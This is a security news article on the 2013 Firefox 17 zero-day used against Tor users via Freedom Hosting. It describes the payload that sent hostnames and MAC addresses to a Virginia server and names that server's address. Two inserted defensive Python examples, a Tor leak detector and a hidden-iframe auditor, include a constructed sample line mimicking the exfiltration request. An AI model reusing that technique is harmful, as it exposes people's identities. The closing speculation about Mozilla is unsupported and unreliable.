
Firefox Zero-day exploited against Tor anonymity

Security researchers found a malicious script that exploits a Firefox zero-day to identify some users of the Tor anonymity network.

My readers know the Tor network well, and its capability to keep users anonymous under specific conditions. We have used terms such as Deep Web, Dark Web and hidden web to stress the impossibility of tracking users in this obscure part of the Internet, but there are some exceptions.

The Tor network is a precious resource for freedom of expression: thanks to it, hacktivists, dissidents and whistleblowers can make their voices heard by the international community. But it is also true that the network is abused by cyber criminals and intelligence agencies.

As I showed in one of my research papers, content on drugs, child pornography and many other illegal activities is the principal resource available on the Tor network; we are facing a market characterized by impressive figures, and websites such as Silk Road are just the tip of the iceberg.

The FBI is exploiting a Firefox zero-day affecting Firefox 17 to track Tor users. Be aware that the Bureau didn't compromise the Tor system itself: it exploited a flaw in the Tor Browser to implant a tracking cookie that fingerprinted users through a specific external server.

Mozilla has announced the presence of a potential security vulnerability in Firefox 17 (MFSA 2013-53), which is currently the extended support release (ESR) version of Firefox.

“Security researcher Nils reported that specially crafted web content using the onreadystatechange event and reloading of pages could sometimes cause a crash when unmapped memory is executed. This crash is potentially exploitable.”

The exploit code was posted by Mozilla, and the deobfuscated JavaScript used by the Tor Browser exploit was posted on Google Code.

The exploit is based on JavaScript that carries a tiny Windows executable hidden in a variable dubbed “Magneto”. The Magneto code looks up the victim’s Windows hostname and MAC address and sends the information back to the FBI’s Virginia server, exposing the victim’s real IP address. The script sends the data back with a standard HTTP request made outside the Tor network.

The security expert and exploit developer Vlad Tsyrklevich analyzed the JavaScript code’s payload, noting that it connects to a server to send back the user’s data.

Briefly, this payload connects to 65.222.202.54:80 and sends it an HTTP request that includes the host name (via gethostname()) and the MAC address of the local host (via calling SendARP on gethostbyname()->h_addr_list). After that it cleans up the state and appears to deliberately crash.

If Tsyrklevich is right, the code could be considered the first sample captured in the wild of the FBI’s “computer and internet protocol address verifier,” aka CIPAV, the law enforcement spyware first reported by WIRED in 2007.
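The deanonymization described above works only because the payload's HTTP request leaves the host directly instead of through Tor. The following detection logic, an added example rather than code from the article, classifies per-connection records from a host firewall and flags any direct egress; the log format, the Tor Browser SOCKS port (assumed 9150), the guard address and all sample lines are constructed.

```python
"""Detection for the exfiltration step described above: on a Tor Browser host
the browser should only talk to the local SOCKS port and the tor daemon only to
its guards, so any other direct connection is a leak. Added example, not the
article's code; the log format, port, guard address and lines are constructed."""
import ipaddress
import re

TOR_SOCKS = ("127.0.0.1", 9150)   # assumed Tor Browser Bundle SOCKS listener
KNOWN_GUARDS = {"198.51.100.7"}   # constructed: relays tor.exe is allowed to dial
INDICATOR = "65.222.202.54"       # address named in Tsyrklevich's analysis
LINE = re.compile(r'proc=(?P<proc>\S+) dst=(?P<ip>[\d.]+):(?P<port>\d+)'
                  r'(?: data="(?P<data>[^"]*)")?')

# Constructed per-connection records from a host firewall; the third line
# mimics the payload's plain HTTP request carrying host identifiers.
SAMPLE_LOG = """\
proc=firefox.exe dst=127.0.0.1:9150
proc=tor.exe dst=198.51.100.7:9001
proc=firefox.exe dst=65.222.202.54:80 data="GET /?hostname=VICTIM-PC&mac=00:11:22:33:44:55 HTTP/1.1"
proc=firefox.exe dst=10.0.0.2:443
"""

def classify(line):
    """Return (verdict, detail) for one connection record."""
    m = LINE.search(line)
    if not m:
        return "unparsed", line
    proc, ip, port = m["proc"], m["ip"], int(m["port"])
    if (ip, port) == TOR_SOCKS:
        return "proxied", proc
    if proc == "tor.exe" and ip in KNOWN_GUARDS:
        return "tor-circuit", ip
    if ipaddress.ip_address(ip).is_private:
        return "local", ip
    # Anything else left the host without passing through Tor.
    reasons = ["direct egress by " + proc]
    if ip == INDICATOR:
        reasons.append("matches published indicator")
    if re.search(r"hostname=|mac=", m["data"] or "", re.I):
        reasons.append("host identifiers in request")
    return "leak", "; ".join(reasons)

def find_leaks(log):
    """Return (line, reasons) for every record that bypassed Tor."""
    leaks = []
    for line in log.splitlines():
        verdict, detail = classify(line)
        if verdict == "leak":
            leaks.append((line, detail))
    return leaks
```

Because the check is structural (anything not proxied, not a guard and not local), it catches the leak even when the destination address is not the one quoted here.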

“Court documents and FBI files released under the FOIA have described the CIPAV as software the FBI can deliver through a browser exploit to gather information from the target’s machine and send it to an FBI server in Virginia. The FBI has been using the CIPAV since 2002 against hackers, online sexual predators, extortionists and others, primarily to identify suspects who are disguising their location using proxy servers or anonymity services, like Tor.” reported the Wired post.

Recently, Eric Eoin Marques, the young man believed to be behind Freedom Hosting, the biggest service provider for sites on the encrypted Tor network, was arrested in Ireland; he is accused of facilitating the dissemination of child pornography.

Marques was arrested on a Maryland warrant after around a year of intense investigation; he faces four charges relating to alleged child pornography offenses, carrying a total of 30 years in jail. The accusations are severe: the FBI considers the man “the largest facilitator of child porn on the planet.”

In 2011, the collective Anonymous hit Freedom Hosting with a denial-of-service attack after allegedly finding that the firm hosted 95 percent of the child porn hidden services on the Tor network.

With Marques’ arrest many popular websites on the Deep Web went down, including services like Tor Mail, HackBB and the Hidden Wiki, all hosted on Freedom Hosting. The concerning news is that in reality many other Tor hidden services may be compromised using a browser exploit.

“The current news indicates that someone has exploited the software behind Freedom Hosting. From what is known so far, the breach was used to configure the server in a way that it injects some sort of javascript exploit in the web pages delivered to users. This exploit is used to load a malware payload to infect users’ computers. The malware payload could be trying to exploit potential bugs in Firefox 17 ESR, on which our Tor Browser is based. We’re investigating these bugs and will fix them if we can.” revealed Andrew Lewman, Tor Project’s Executive Director, in a blog post.

For massive distribution of the malicious script, the FBI used the Freedom Hosting platform, injecting its HTML code into the pages visited by victims. The script first checks the version of the user’s browser, and if it recognizes Firefox 17 it collects the information described above.

Shortly after Marques’ arrest, all of the hidden service sites hosted by Freedom Hosting began displaying a “Down for Maintenance” message. Some users noted a malicious script in the source code of the maintenance page: it included a hidden iframe tag that loaded a mysterious clump of JavaScript code from a Verizon Business internet address located in eastern Virginia.
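A hidden iframe that pulls content from a bare IP address on another host is the kind of injection a hosting operator can check served pages for. The auditor below is an added example, not code from the article or the Tor Project; the maintenance page it inspects is constructed, and the iframe path is made up, with only the IP address taken from the payload analysis quoted earlier.

```python
"""Audit HTML for the injected-loader pattern described above: a hidden iframe
pulling content from another host or a bare IP address. Added example, not the
article's code; SAMPLE_PAGE is constructed."""
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed maintenance page: one benign same-site iframe plus an injected
# one pointing at the address named in the payload analysis (path is made up).
SAMPLE_PAGE = """<html><body><h1>Down for Maintenance</h1>
<iframe src="/status.html" width="300" height="100"></iframe>
<iframe src="http://65.222.202.54/example.html" width="0" height="0"
        style="display:none"></iframe>
</body></html>"""

def _is_bare_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

class IframeAuditor(HTMLParser):
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host   # host the page was served from
        self.findings = []           # (src, [reason, ...]) per suspicious iframe

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}   # bare attributes arrive as None
        src = a.get("src", "")
        host = urlparse(src).hostname or ""
        style = a.get("style", "").replace(" ", "").lower()
        reasons = []
        if host and host != self.page_host:
            reasons.append("off-site src")
        if _is_bare_ip(host):
            reasons.append("bare IP src")
        if "0" in (a.get("width", "").strip(), a.get("height", "").strip()):
            reasons.append("zero size")
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden by style")
        if reasons:
            self.findings.append((src, reasons))

def audit_page(html, page_host):
    """Return [(src, reasons)] for iframes in html that look injected."""
    auditor = IframeAuditor(page_host)
    auditor.feed(html)
    return auditor.findings
```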

FBI or NSA?

Although the researchers initially blamed the FBI for the design of the malicious script, it appears that the IP address found in the script belongs to the National Security Agency (NSA). The revelation came from Baneki Privacy Labs, a collective of Internet security researchers, and VPN provider Cryptocloud.

“Initial investigations traced the address to defense contractor SAIC, which provides a wide range of information technology and C4ISR (Command, Control, Communications, Computers, Intelligence, Surveillance, and Reconnaissance) support to the Department of Defense. The geolocation of the IP address corresponds to an SAIC facility in Arlington, Virginia. Further analysis using a DNS record tool from Robotex found that the address was actually part of several blocks of IP addresses permanently assigned to the NSA. This immediately spooked the researchers. “One researcher contacted us and said, ‘Here’s the Robotex info. Forget that you heard it from me,’” a member of Baneki who requested he not be identified told Ars.” reads a post published on Ars Technica.

Does Mozilla work for the US government?

Another strange circumstance is that in the past the browser disabled JavaScript execution by default for security purposes, but the setting was reverted to enabled by default to make the browser more usable, and more vulnerable.

The consequences could be dramatic for a huge number of hacktivists and dissidents: exploitation of the Firefox zero-day may have favored regimes and the tracking of innocent users opposed to government censorship.

Meantime … if you are a Windows user, update your Tor Browser Bundle to the new version 3.0 alpha2 released today.


Pierluigi Paganini

(Security Affairs – Firefox Zero-day, FBI)
